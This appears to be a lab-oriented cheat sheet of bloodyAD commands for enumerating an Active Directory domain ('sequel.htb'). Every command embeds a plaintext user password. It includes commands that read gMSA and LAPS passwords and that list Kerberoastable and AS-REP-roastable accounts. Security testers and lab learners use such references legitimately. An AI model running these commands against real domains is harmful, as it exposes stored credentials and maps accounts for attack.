Get Examples

Get Children

List children for a given target object.

bloodyAD --dc-ip 10.129.222.191 --host dc01.sequel.htb -d sequel.htb -u ryan -p 'WqSZAF6CysDQbGb3' get children
bloodyAD --dc-ip 10.129.222.191 --host dc01.sequel.htb -d sequel.htb -u ryan -p 'WqSZAF6CysDQbGb3' get children --target "Rose"
bloodyAD --dc-ip 10.129.222.191 --host dc01.sequel.htb -d sequel.htb -u ryan -p 'WqSZAF6CysDQbGb3' get children --target "Remote Management Users"

Get all Users

bloodyAD --dc-ip 10.129.222.191 --host dc01.sequel.htb -d sequel.htb -u ryan -p 'WqSZAF6CysDQbGb3' get children --otype useronly

Get all computers

bloodyAD --dc-ip 10.129.222.191 --host dc01.sequel.htb -d sequel.htb -u ryan -p 'WqSZAF6CysDQbGb3' get children --otype computer

Get all containers

bloodyAD --dc-ip 10.129.222.191 --host dc01.sequel.htb -d sequel.htb -u ryan -p 'WqSZAF6CysDQbGb3' get children --otype container

Get Membership

Retrieve SID and SAM Account Names of all groups a target belongs to.

bloodyAD --dc-ip 10.129.222.191 --host dc01.sequel.htb -d sequel.htb -u ryan -p 'WqSZAF6CysDQbGb3' get membership "rose" 
bloodyAD --dc-ip 10.129.222.191 --host dc01.sequel.htb -d sequel.htb -u ryan -p 'WqSZAF6CysDQbGb3' get membership "rose" --no-recurse

Info

--no-recurse if it's set, doesn't retrieve groups where target isn't a direct member (default: False)

Get Object

Retrieve LDAP attributes for the target object provided, binary data will be outputted in base64.

bloodyAD --dc-ip 10.129.222.191 --host dc01.sequel.htb -d sequel.htb -u ryan -p 'WqSZAF6CysDQbGb3' get object ""
bloodyAD --dc-ip 10.129.222.191 --host dc01.sequel.htb -d sequel.htb -u ryan -p 'WqSZAF6CysDQbGb3' get object --attr "*" "rose"
bloodyAD --dc-ip 10.129.222.191 --host dc01.sequel.htb -d sequel.htb -u ryan -p 'WqSZAF6CysDQbGb3' get object --attr "*" --resolve-sd "rose"

Get Group Members of an user

bloodyAD --dc-ip 10.129.222.191 --host dc01.sequel.htb -d sequel.htb -u ryan -p 'WqSZAF6CysDQbGb3'  get object "Domain Admins" --attr member

Get UAC of an user

bloodyAD --dc-ip 10.129.222.191 --host dc01.sequel.htb -d sequel.htb -u ryan -p 'WqSZAF6CysDQbGb3'  get object "ryan" --attr userAccountControl

Read GMSA Account Password

bloodyAD --dc-ip 10.129.222.191 --host dc01.sequel.htb -d sequel.htb -u ryan -p 'WqSZAF6CysDQbGb3'  get object 'gmsaAccount$' --attr msDS-ManagedPassword

Read LAPS Password

bloodyAD --dc-ip 10.129.222.191 --host dc01.sequel.htb -d sequel.htb -u ryan -p 'WqSZAF6CysDQbGb3'  get object 'COMPUTER$' --attr ms-Mcs-AdmPwd

Get AD forest level

Retrieves the forest functional level of the Active Directory environment.

bloodyAD --dc-ip 10.129.222.191 --host dc01.sequel.htb -d sequel.htb -u ryan -p 'WqSZAF6CysDQbGb3' get object 'DC=sequel,DC=htb' --attr msDS-Behavior-Version

Get Machine Account Quota (MAQ)

Displays the maximum number of machine accounts a user can create in the Active Directory.

bloodyAD --dc-ip 10.129.222.191 --host dc01.sequel.htb -d sequel.htb -u ryan -p 'WqSZAF6CysDQbGb3' get object 'DC=sequel,DC=htb' --attr ms-DS-MachineAccountQuota

Get min Password Length

Retrieves the minimum password length policy for the domain.

bloodyAD --dc-ip 10.129.222.191 --host dc01.sequel.htb -d sequel.htb -u ryan -p 'WqSZAF6CysDQbGb3' get object 'DC=sequel,DC=htb' --attr minPwdLength

Get Trusts

Display trusts in an ascii tree starting from the DC domain as tree root.

Info

A->B means A can auth on B.
A-<B means B can auth on A.
A-<>B means bidirectionnal.

bloodyAD --dc-ip 10.129.222.191 --host dc01.sequel.htb -d sequel.htb -u ryan -p 'WqSZAF6CysDQbGb3' get trusts
bloodyAD --dc-ip 10.129.222.191 --host dc01.sequel.htb -d sequel.htb -u ryan -p 'WqSZAF6CysDQbGb3' get trusts --transitive
bloodyAD --dc-ip 10.129.222.191 --host dc01.sequel.htb -d sequel.htb -u ryan -p 'WqSZAF6CysDQbGb3' get children --otype trustedDomain

Info

--transitive Try to fetch transitive trusts (you should start from a dc of your user domain to have more complete results) (default: False)

Get Writable Objects

Lists objects in Active Directory that can be modified by the current user.

bloodyAD --dc-ip 10.129.222.191 --host dc01.sequel.htb -d sequel.htb -u ryan -p 'WqSZAF6CysDQbGb3' get writable
bloodyAD --dc-ip 10.129.222.191 --host dc01.sequel.htb -d sequel.htb -u ryan -p 'WqSZAF6CysDQbGb3' get writable --detail

Get all DNS record from AD

Retrieve DNS records of the Active Directory readable/listable by the user

bloodyAD --dc-ip 10.129.222.191 --host dc01.sequel.htb -d sequel.htb -u ryan -p 'WqSZAF6CysDQbGb3' get dnsDump
bloodyAD --dc-ip 10.129.222.191 --host dc01.sequel.htb -d sequel.htb -u ryan -p 'WqSZAF6CysDQbGb3' get dnsDump | sed -n '/[^\n]*\*/,/^$/p'

Search for Users

Finds and retrieves attributes for all objects of class user.

bloodyAD --dc-ip 10.129.222.191 --host dc01.sequel.htb -d sequel.htb -u ryan -p 'WqSZAF6CysDQbGb3' get search --filter "(objectClass=user)" --attr "*"
bloodyAD --dc-ip 10.129.222.191 --host dc01.sequel.htb -d sequel.htb -u ryan -p 'WqSZAF6CysDQbGb3' get search --filter "(objectClass=user)" --attr "*" --resolve-sd

Search for Groups

Finds and retrieves attributes for all objects of class group.

bloodyAD --dc-ip 10.129.222.191 --host dc01.sequel.htb -d sequel.htb -u ryan -p 'WqSZAF6CysDQbGb3' get search --filter "(objectClass=group)" --attr "*"
bloodyAD --dc-ip 10.129.222.191 --host dc01.sequel.htb -d sequel.htb -u ryan -p 'WqSZAF6CysDQbGb3' get search --filter "(objectClass=group)" --attr "*" --resolve-sd

Search for min Password Age policy

Gets the minimum password age policy, which defines the minimum amount of time before a user can change their password.

bloodyAD --dc-ip 10.129.222.191 --host dc01.sequel.htb -d sequel.htb -u ryan -p 'WqSZAF6CysDQbGb3' get search --filter "(objectClass=domain)" --attr "minPwdAge"

Search Kerberoastable accounts

Identifies accounts with Service Principal Names (SPNs) that can be targeted for Kerberoasting attacks.

bloodyAD --dc-ip 10.129.222.191 --host dc01.sequel.htb -d sequel.htb -u ryan -p 'WqSZAF6CysDQbGb3' get search --filter '(&(samAccountType=805306368)(servicePrincipalName=*))' --attr sAMAccountName | grep sAMAccountName | cut -d ' ' -f 2

Search accounts that do not require Kerberos pre-authentication (AS-REP)

Finds accounts that do not require Kerberos pre-authentication, making them vulnerable to AS-REP roasting attacks.

bloodyAD --dc-ip 10.129.222.191 --host dc01.sequel.htb -d sequel.htb -u ryan -p 'WqSZAF6CysDQbGb3' get search --filter '(&(userAccountControl:1.2.840.113556.1.4.803:=4194304)(!(UserAccountControl:1.2.840.113556.1.4.803:=2)))' --attr sAMAccountName